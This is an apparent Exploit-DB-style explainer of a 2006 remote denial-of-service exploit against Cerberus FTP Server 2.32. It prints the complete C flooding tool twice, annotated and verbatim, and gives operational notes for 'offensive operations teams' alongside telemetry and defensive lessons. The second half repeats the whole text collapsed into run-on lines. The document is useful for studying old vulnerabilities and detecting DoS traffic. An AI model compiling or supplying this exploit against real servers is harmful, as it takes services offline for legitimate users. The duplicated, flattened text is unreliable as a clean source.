Understanding the Cerberus FTP Server 2.32 Denial of Service Exploit

What this paper is

This paper details a Denial of Service (DoS) vulnerability in Cerberus FTP Server version 2.32. The exploit, written in C, targets this vulnerability by sending a crafted, repetitive network request to the FTP server. The goal is to overwhelm the server's resources or cause it to crash, making it unavailable to legitimate users. This is a remote exploit, meaning it can be triggered from a different machine on the network.

Simple technical breakdown

The exploit works by repeatedly sending a specific string of data to the Cerberus FTP Server. This data is designed to trigger a flaw in how the server handles certain network requests. When the server receives this malformed or excessive data, it enters an unstable state, leading to a crash or becoming unresponsive.

The core of the exploit involves:

Establishing a connection: Connecting to the target FTP server on its standard port (usually 21).
Crafting a payload: Creating a data string that will trigger the vulnerability.
Repetitive sending: Sending this payload many times in quick succession.

Complete code and payload walkthrough

Let's break down the provided C code and its components.

/*
Cerberus FTP Server 2.32 Denial of Service
original advisory: http://kapda.ir/advisory-210.html
cerberus_232_dos_remote_xpl.c
*/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

#define  POCSTR "%s" // Macro for string formatting, essentially a placeholder for a string.

int header(); // Function prototype for displaying exploit information.
int usage(char *filename); // Function prototype for displaying usage instructions.
int remote_connect( char* ip, unsigned short port ); // Function prototype for establishing a network connection.

int header() {
printf("\n[i] KAPDA - Computer Security Science Researchers Institute\n\n");
printf("[i] Title:              \tCerberus FTP Server <= v2.32 Dos Exploit\n");
printf("[i] Discovered by:      \tcvh {a] kapda.ir\n");
printf("[i] Exploit by:         \tPi3cH {a] kapda.ir\n");
printf("[i] More info:          \twww.kapda.ir/page-advisory.html\n\n");
return 0;
}

// Mapping: header() -> Displays introductory information about the exploit.

int usage(char *filename) {
printf("[i] Usage:   \t%s HOST PORT\n",filename);
printf("[i] Example: \t%s 127.0.0.1 21\n\n",filename);
exit(0);
}

// Mapping: usage(char *filename) -> Prints how to run the exploit and exits.

int remote_connect( char* ip, unsigned short port )
{
int s; // Socket file descriptor.
struct sockaddr_in remote_addr; // Structure to hold remote address information.
struct hostent* host_addr; // Structure to hold host information (like IP address).

memset ( &remote_addr, 0x0, sizeof ( remote_addr ) ); // Initialize the remote address structure to zeros.

if ( ( host_addr = gethostbyname ( ip ) ) == NULL ) // Resolve the hostname/IP address.
{
printf ( "[e] Cannot resolve \"%s\"\n", ip ); // Error if hostname resolution fails.
exit ( 1 ); // Exit the program.
}

remote_addr.sin_family = AF_INET; // Set the address family to IPv4.
remote_addr.sin_port = htons ( port ); // Set the port number, converting to network byte order.
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr ); // Copy the resolved IP address.

if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 ) // Create a TCP socket.
{
printf ( "[e] Socket failed!\n" ); // Error if socket creation fails.
exit(1); // Exit the program.
}

if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 ) // Attempt to connect to the remote server.
{
printf ( "[e] Failed connecting!\n" ); // Error if connection fails.
       exit(1); // Exit the program.
}
return ( s ); // Return the socket file descriptor if connection is successful.
}

// Mapping: remote_connect(char* ip, unsigned short port) -> Handles DNS resolution, socket creation, and TCP connection to the target.

int main(int argc, char *argv[]) {
 int s,i; // s for socket descriptor, i for loop counter.
 char *request; // Pointer to a buffer for the crafted request.
 char junk_data[] = "DoS-JUNK-DATA.:(CVH):.\x0d\x0a"; // The data string to be sent. \x0d\x0a are carriage return and line feed.

 header(); // Display the exploit header.

 if( (argc < 2) ) // Check if at least one command-line argument (host) is provided.
     usage(argv[0]); // If not, show usage instructions and exit.

 request = (char *) malloc(1024); // Allocate 1024 bytes for the request buffer.
 printf("[r] Connecting to remote host\n");
 s = remote_connect(argv[1],atoi(argv[2])); // Connect to the target using the provided IP (argv[1]) and port (argv[2]). atoi converts the port string to an integer.

 sleep(1); // Pause for 1 second.

 printf("[r] Creating buffer\n");
 sprintf(request,POCSTR,junk_data); // Format the request buffer. POCSTR is "%s", so it just copies junk_data into request.
 printf("[r] Sending %d bytes of DOS buffer\n",strlen(request)); // Print the size of the data to be sent.

 for(i=0;i<50000;i++) // Loop 50,000 times.
  if ( send ( s, request, strlen (request), 0) <= 0 ) // Send the crafted request data.
  {
          printf("[e] Failed to send buffer\n"); // Error if sending fails.
          close(s); // Close the socket.
          exit(1); // Exit the program.
  }

 sleep(1); // Pause for 1 second.

 printf("[s] Exploit Done!\n"); // Indicate successful completion of sending.
 close(s); // Close the socket.
 free(request); // Free the allocated memory.
 request = NULL; // Set the pointer to NULL to avoid dangling pointers.
 return 0; // Exit successfully.
}

// Mapping: main(int argc, char *argv[]) -> Orchestrates the exploit execution: displays header, checks arguments, connects, crafts and repeatedly sends the DoS payload, then cleans up.

// Mapping: junk_data[] = "DoS-JUNK-DATA.:(CVH):.\x0d\x0a" -> This is the actual payload. It's a simple string with some arbitrary text and FTP-style line endings (CRLF). The vulnerability likely lies in how Cerberus FTP Server 2.32 processes repeated or malformed commands, and this string is used to trigger that. The exact nature of the flaw isn't detailed in the code itself, but the repetition is key.

// Mapping: sprintf(request,POCSTR,junk_data); -> This line effectively copies the contents of `junk_data` into the `request` buffer. `POCSTR` is defined as `"%s"`, so `sprintf` performs a simple string copy. The `request` buffer is allocated to 1024 bytes, but only the length of `junk_data` is used.

// Mapping: for(i=0;i<50000;i++) if ( send ( s, request, strlen (request), 0) <= 0 ) -> This loop is the core of the DoS. It sends the `request` buffer (containing `junk_data`) 50,000 times to the connected socket `s`. The `send` function attempts to transmit the data. If `send` returns 0 or a negative value, it indicates an error or that no data was sent, which is treated as a failure.

// milw0rm.com [2006-01-16] -> This is a comment indicating the source and publication date of the exploit.

## Practical details for offensive operations teams

*   **Required Access Level:** Network access to the target system's IP address and port. No local access or elevated privileges are required on the target.
*   **Lab Preconditions:**
    *   A vulnerable Cerberus FTP Server 2.32 instance must be running and accessible over the network.
    *   A separate machine to run the exploit.
    *   Network connectivity between the attacker machine and the target server.
*   **Tooling Assumptions:**
    *   The exploit is written in C and requires a C compiler (like GCC) to build on the attacker's machine.
    *   Standard networking libraries (`sys/socket.h`, `netinet/in.h`, `netdb.h`) are assumed to be available on the build environment.
*   **Execution Pitfalls:**
    *   **Incorrect Target Version:** The exploit is specific to Cerberus FTP Server 2.32. It will likely not work against other versions or different FTP servers.
    *   **Network Firewalls/IPS:** Network security devices might detect the repetitive, unusual traffic and block it or alert defenders.
    *   **Server Resilience:** Modern systems might have built-in DoS protection mechanisms that could mitigate the impact.
    *   **Incorrect Port:** If the FTP server is running on a non-standard port, the exploit will fail to connect.
    *   **Hostname Resolution Failure:** If the target IP address is invalid or cannot be resolved, the `gethostbyname` function will fail.
    *   **Connection Failure:** Network issues, incorrect IP/port, or the server being down will cause `connect` to fail.
    *   **Send Failure:** If the server is already overloaded or the connection is unstable, `send` might fail.
*   **Telemetry:**
    *   **Network Traffic:** High volume of TCP packets originating from the attacker's IP to the target's IP on port 21 (or the configured FTP port). The packets will contain the `DoS-JUNK-DATA.:(CVH):.\r\n` payload.
    *   **Server Resource Utilization:** A spike in CPU and memory usage on the target FTP server machine as it attempts to process the excessive requests.
    *   **Application Logs:** The Cerberus FTP Server logs might show a flood of connection attempts or errors related to processing commands, potentially leading to a crash log.
    *   **System Logs:** If the server crashes, operating system logs (e.g., Windows Event Viewer) might record an application crash.
    *   **Service Unavailability:** The primary indicator is the FTP service becoming unresponsive or inaccessible to legitimate users.

## Where this was used and when

This exploit was published in January 2006. At that time, Cerberus FTP Server was a popular choice for Windows-based FTP services. Exploits like this were common in the early to mid-2000s as security practices were less mature, and many applications had vulnerabilities that could be exploited remotely. This specific exploit targets a known DoS vulnerability, which would have been used to disrupt the availability of FTP services for organizations running the vulnerable version.

## Defensive lessons for modern teams

*   **Version Management:** Regularly patch and update all software, especially network-facing services like FTP servers. Vulnerabilities are often fixed in newer versions.
*   **Network Segmentation and Firewalls:** Restrict access to FTP servers to only necessary internal networks or trusted external IPs. Use firewalls to block unexpected traffic.
*   **Intrusion Detection/Prevention Systems (IDS/IPS):** Deploy and configure IDS/IPS to detect and potentially block patterns of suspicious network traffic, such as repetitive or malformed requests.
*   **Rate Limiting:** Implement rate limiting on network services to prevent a single client from overwhelming the server with too many requests in a short period.
*   **Application Hardening:** Configure FTP servers securely. Disable unnecessary features, use strong authentication, and ensure logging is enabled.
*   **Regular Vulnerability Scanning:** Proactively scan your environment for known vulnerabilities to identify and remediate them before they can be exploited.
*   **Monitoring:** Monitor server resource utilization (CPU, memory, network bandwidth) for unusual spikes that could indicate an ongoing attack.

## ASCII visual (if applicable)

This exploit is a client-server interaction. A simple visual representation of the connection and data flow would be:

+-----------------+ +-------------------------+
| Attacker Machine| ----> | Cerberus FTP Server 2.32|
| (Exploit Client)| | (Vulnerable Target) |
+-----------------+ +-------------------------+
| |
| 1. Establish TCP Conn. |
| (e.g., Port 21) |
| |
| 2. Send 50,000x |
| "DoS-JUNK-DATA..." | ----> Triggers Vulnerability
| | (e.g., crash, hang)
| |
| 3. Service Unavailable |
+-------------------------+


## Source references

*   **Exploit-DB Paper:** [https://www.exploit-db.com/papers/1422](https://www.exploit-db.com/papers/1422)
*   **Original Advisory (referenced in code):** [http://kapda.ir/advisory-210.html](http://kapda.ir/advisory-210.html)

---

## Original Exploit-DB Content (Verbatim)

```text
/*
Cerberus FTP Server 2.32 Denial of Service
original advisory: http://kapda.ir/advisory-210.html
cerberus_232_dos_remote_xpl.c
*/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

#define  POCSTR "%s"

int header();
int usage(char *filename);
int remote_connect( char* ip, unsigned short port );

int header() {
printf("\n[i] KAPDA - Computer Security Science Researchers Institute\n\n");
printf("[i] Title:              \tCerberus FTP Server <= v2.32 Dos Exploit\n");
printf("[i] Discovered by:      \tcvh {a] kapda.ir\n");
printf("[i] Exploit by:         \tPi3cH {a] kapda.ir\n");
printf("[i] More info:          \twww.kapda.ir/page-advisory.html\n\n");
return 0;
}

int usage(char *filename) {
printf("[i] Usage:   \t%s HOST PORT\n",filename);
printf("[i] Example: \t%s 127.0.0.1 21\n\n",filename);
exit(0);
}

int remote_connect( char* ip, unsigned short port )
{
int s;
struct sockaddr_in remote_addr;
struct hostent* host_addr;

memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
{
printf ( "[e] Cannot resolve \"%s\"\n", ip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( port );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "[e] Socket failed!\n" );
exit(1);
}
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
{
printf ( "[e] Failed connecting!\n" );
       exit(1);
}
return ( s );
}


int main(int argc, char *argv[]) {
 int s,i;
 char *request;
 char junk_data[] = "DoS-JUNK-DATA.:(CVH):.\x0d\x0a";
 header();
 if( (argc < 2) )
     usage(argv[0]);
 request = (char *) malloc(1024);
 printf("[r] Connecting to remote host\n");
 s = remote_connect(argv[1],atoi(argv[2]));
 sleep(1);
 printf("[r] Creating buffer\n");
 sprintf(request,POCSTR,junk_data);
 printf("[r] Sending %d bytes of DOS buffer\n",strlen(request));
 for(i=0;i<50000;i++)
  if ( send ( s, request, strlen (request), 0) <= 0 )
  {
          printf("[e] Failed to send buffer\n");
          close(s);
          exit(1);
  }
 sleep(1);
 printf("[s] Exploit Done!\n");
 close(s);
 free(request);
 request = NULL;
 return 0;
}

// milw0rm.com [2006-01-16]

What this paper is

Simple technical breakdown

The core of the exploit involves:

Establishing a connection: Connecting to the target FTP server on its standard port (usually 21).

Crafting a payload: Creating a data string that will trigger the vulnerability.

Repetitive sending: Sending this payload many times in quick succession.

Complete code and payload walkthrough

Let's break down the provided C code and its components.

/* Cerberus FTP Server 2.32 Denial of Service original advisory: http://kapda.ir/advisory-210.html cerberus_232_dos_remote_xpl.c */ #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #define POCSTR "%s" // Macro for string formatting, essentially a placeholder for a string. int header(); // Function prototype for displaying exploit information. int usage(char *filename); // Function prototype for displaying usage instructions. int remote_connect( char* ip, unsigned short port ); // Function prototype for establishing a network connection. int header() { printf("\n[i] KAPDA - Computer Security Science Researchers Institute\n\n"); printf("[i] Title: \tCerberus FTP Server <= v2.32 Dos Exploit\n"); printf("[i] Discovered by: \tcvh {a] kapda.ir\n"); printf("[i] Exploit by: \tPi3cH {a] kapda.ir\n"); printf("[i] More info: \twww.kapda.ir/page-advisory.html\n\n"); return 0; } // Mapping: header() -> Displays introductory information about the exploit. int usage(char *filename) { printf("[i] Usage: \t%s HOST PORT\n",filename); printf("[i] Example: \t%s 127.0.0.1 21\n\n",filename); exit(0); } // Mapping: usage(char *filename) -> Prints how to run the exploit and exits. int remote_connect( char* ip, unsigned short port ) { int s; // Socket file descriptor. struct sockaddr_in remote_addr; // Structure to hold remote address information. struct hostent* host_addr; // Structure to hold host information (like IP address). memset ( &remote_addr, 0x0, sizeof ( remote_addr ) ); // Initialize the remote address structure to zeros. if ( ( host_addr = gethostbyname ( ip ) ) == NULL ) // Resolve the hostname/IP address. { printf ( "[e] Cannot resolve \"%s\"\n", ip ); // Error if hostname resolution fails. exit ( 1 ); // Exit the program. } remote_addr.sin_family = AF_INET; // Set the address family to IPv4. remote_addr.sin_port = htons ( port ); // Set the port number, converting to network byte order. remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr ); // Copy the resolved IP address. if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 ) // Create a TCP socket. { printf ( "[e] Socket failed!\n" ); // Error if socket creation fails. exit(1); // Exit the program. } if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) // Attempt to connect to the remote server. { printf ( "[e] Failed connecting!\n" ); // Error if connection fails. exit(1); // Exit the program. } return ( s ); // Return the socket file descriptor if connection is successful. } // Mapping: remote_connect(char* ip, unsigned short port) -> Handles DNS resolution, socket creation, and TCP connection to the target. int main(int argc, char *argv[]) { int s,i; // s for socket descriptor, i for loop counter. char *request; // Pointer to a buffer for the crafted request. char junk_data[] = "DoS-JUNK-DATA.:(CVH):.\x0d\x0a"; // The data string to be sent. \x0d\x0a are carriage return and line feed. header(); // Display the exploit header. if( (argc < 2) ) // Check if at least one command-line argument (host) is provided. usage(argv[0]); // If not, show usage instructions and exit. request = (char *) malloc(1024); // Allocate 1024 bytes for the request buffer. printf("[r] Connecting to remote host\n"); s = remote_connect(argv[1],atoi(argv[2])); // Connect to the target using the provided IP (argv[1]) and port (argv[2]). atoi converts the port string to an integer. sleep(1); // Pause for 1 second. printf("[r] Creating buffer\n"); sprintf(request,POCSTR,junk_data); // Format the request buffer. POCSTR is "%s", so it just copies junk_data into request. printf("[r] Sending %d bytes of DOS buffer\n",strlen(request)); // Print the size of the data to be sent. for(i=0;i<50000;i++) // Loop 50,000 times. if ( send ( s, request, strlen (request), 0) <= 0 ) // Send the crafted request data. { printf("[e] Failed to send buffer\n"); // Error if sending fails. close(s); // Close the socket. exit(1); // Exit the program. } sleep(1); // Pause for 1 second. printf("[s] Exploit Done!\n"); // Indicate successful completion of sending. close(s); // Close the socket. free(request); // Free the allocated memory. request = NULL; // Set the pointer to NULL to avoid dangling pointers. return 0; // Exit successfully. } // Mapping: main(int argc, char *argv[]) -> Orchestrates the exploit execution: displays header, checks arguments, connects, crafts and repeatedly sends the DoS payload, then cleans up. // Mapping: junk_data[] = "DoS-JUNK-DATA.:(CVH):.\x0d\x0a" -> This is the actual payload. It's a simple string with some arbitrary text and FTP-style line endings (CRLF). The vulnerability likely lies in how Cerberus FTP Server 2.32 processes repeated or malformed commands, and this string is used to trigger that. The exact nature of the flaw isn't detailed in the code itself, but the repetition is key. // Mapping: sprintf(request,POCSTR,junk_data); -> This line effectively copies the contents of `junk_data` into the `request` buffer. `POCSTR` is defined as `"%s"`, so `sprintf` performs a simple string copy. The `request` buffer is allocated to 1024 bytes, but only the length of `junk_data` is used. // Mapping: for(i=0;i<50000;i++) if ( send ( s, request, strlen (request), 0) <= 0 ) -> This loop is the core of the DoS. It sends the `request` buffer (containing `junk_data`) 50,000 times to the connected socket `s`. The `send` function attempts to transmit the data. If `send` returns 0 or a negative value, it indicates an error or that no data was sent, which is treated as a failure. // milw0rm.com [2006-01-16] -> This is a comment indicating the source and publication date of the exploit. ## Practical details for offensive operations teams * **Required Access Level:** Network access to the target system's IP address and port. No local access or elevated privileges are required on the target. * **Lab Preconditions:** * A vulnerable Cerberus FTP Server 2.32 instance must be running and accessible over the network. * A separate machine to run the exploit. * Network connectivity between the attacker machine and the target server. * **Tooling Assumptions:** * The exploit is written in C and requires a C compiler (like GCC) to build on the attacker's machine. * Standard networking libraries (`sys/socket.h`, `netinet/in.h`, `netdb.h`) are assumed to be available on the build environment. * **Execution Pitfalls:** * **Incorrect Target Version:** The exploit is specific to Cerberus FTP Server 2.32. It will likely not work against other versions or different FTP servers. * **Network Firewalls/IPS:** Network security devices might detect the repetitive, unusual traffic and block it or alert defenders. * **Server Resilience:** Modern systems might have built-in DoS protection mechanisms that could mitigate the impact. * **Incorrect Port:** If the FTP server is running on a non-standard port, the exploit will fail to connect. * **Hostname Resolution Failure:** If the target IP address is invalid or cannot be resolved, the `gethostbyname` function will fail. * **Connection Failure:** Network issues, incorrect IP/port, or the server being down will cause `connect` to fail. * **Send Failure:** If the server is already overloaded or the connection is unstable, `send` might fail. * **Telemetry:** * **Network Traffic:** High volume of TCP packets originating from the attacker's IP to the target's IP on port 21 (or the configured FTP port). The packets will contain the `DoS-JUNK-DATA.:(CVH):.\r\n` payload. * **Server Resource Utilization:** A spike in CPU and memory usage on the target FTP server machine as it attempts to process the excessive requests. * **Application Logs:** The Cerberus FTP Server logs might show a flood of connection attempts or errors related to processing commands, potentially leading to a crash log. * **System Logs:** If the server crashes, operating system logs (e.g., Windows Event Viewer) might record an application crash. * **Service Unavailability:** The primary indicator is the FTP service becoming unresponsive or inaccessible to legitimate users. ## Where this was used and when This exploit was published in January 2006. At that time, Cerberus FTP Server was a popular choice for Windows-based FTP services. Exploits like this were common in the early to mid-2000s as security practices were less mature, and many applications had vulnerabilities that could be exploited remotely. This specific exploit targets a known DoS vulnerability, which would have been used to disrupt the availability of FTP services for organizations running the vulnerable version. ## Defensive lessons for modern teams * **Version Management:** Regularly patch and update all software, especially network-facing services like FTP servers. Vulnerabilities are often fixed in newer versions. * **Network Segmentation and Firewalls:** Restrict access to FTP servers to only necessary internal networks or trusted external IPs. Use firewalls to block unexpected traffic. * **Intrusion Detection/Prevention Systems (IDS/IPS):** Deploy and configure IDS/IPS to detect and potentially block patterns of suspicious network traffic, such as repetitive or malformed requests. * **Rate Limiting:** Implement rate limiting on network services to prevent a single client from overwhelming the server with too many requests in a short period. * **Application Hardening:** Configure FTP servers securely. Disable unnecessary features, use strong authentication, and ensure logging is enabled. * **Regular Vulnerability Scanning:** Proactively scan your environment for known vulnerabilities to identify and remediate them before they can be exploited. * **Monitoring:** Monitor server resource utilization (CPU, memory, network bandwidth) for unusual spikes that could indicate an ongoing attack. ## ASCII visual (if applicable) This exploit is a client-server interaction. A simple visual representation of the connection and data flow would be:

## Source references * **Exploit-DB Paper:** [https://www.exploit-db.com/papers/1422](https://www.exploit-db.com/papers/1422) * **Original Advisory (referenced in code):** [http://kapda.ir/advisory-210.html](http://kapda.ir/advisory-210.html) --- ## Original Exploit-DB Content (Verbatim) ```text /* Cerberus FTP Server 2.32 Denial of Service original advisory: http://kapda.ir/advisory-210.html cerberus_232_dos_remote_xpl.c */ #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #define POCSTR "%s" int header(); int usage(char *filename); int remote_connect( char* ip, unsigned short port ); int header() { printf("\n[i] KAPDA - Computer Security Science Researchers Institute\n\n"); printf("[i] Title: \tCerberus FTP Server <= v2.32 Dos Exploit\n"); printf("[i] Discovered by: \tcvh {a] kapda.ir\n"); printf("[i] Exploit by: \tPi3cH {a] kapda.ir\n"); printf("[i] More info: \twww.kapda.ir/page-advisory.html\n\n"); return 0; } int usage(char *filename) { printf("[i] Usage: \t%s HOST PORT\n",filename); printf("[i] Example: \t%s 127.0.0.1 21\n\n",filename); exit(0); } int remote_connect( char* ip, unsigned short port ) { int s; struct sockaddr_in remote_addr; struct hostent* host_addr; memset ( &remote_addr, 0x0, sizeof ( remote_addr ) ); if ( ( host_addr = gethostbyname ( ip ) ) == NULL ) { printf ( "[e] Cannot resolve \"%s\"\n", ip ); exit ( 1 ); } remote_addr.sin_family = AF_INET; remote_addr.sin_port = htons ( port ); remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr ); if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 ) { printf ( "[e] Socket failed!\n" ); exit(1); } if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) { printf ( "[e] Failed connecting!\n" ); exit(1); } return ( s ); } int main(int argc, char *argv[]) { int s,i; char *request; char junk_data[] = "DoS-JUNK-DATA.:(CVH):.\x0d\x0a"; header(); if( (argc < 2) ) usage(argv[0]); request = (char *) malloc(1024); printf("[r] Connecting to remote host\n"); s = remote_connect(argv[1],atoi(argv[2])); sleep(1); printf("[r] Creating buffer\n"); sprintf(request,POCSTR,junk_data); printf("[r] Sending %d bytes of DOS buffer\n",strlen(request)); for(i=0;i<50000;i++) if ( send ( s, request, strlen (request), 0) <= 0 ) { printf("[e] Failed to send buffer\n"); close(s); exit(1); } sleep(1); printf("[s] Exploit Done!\n"); close(s); free(request); request = NULL; return 0; } // milw0rm.com [2006-01-16]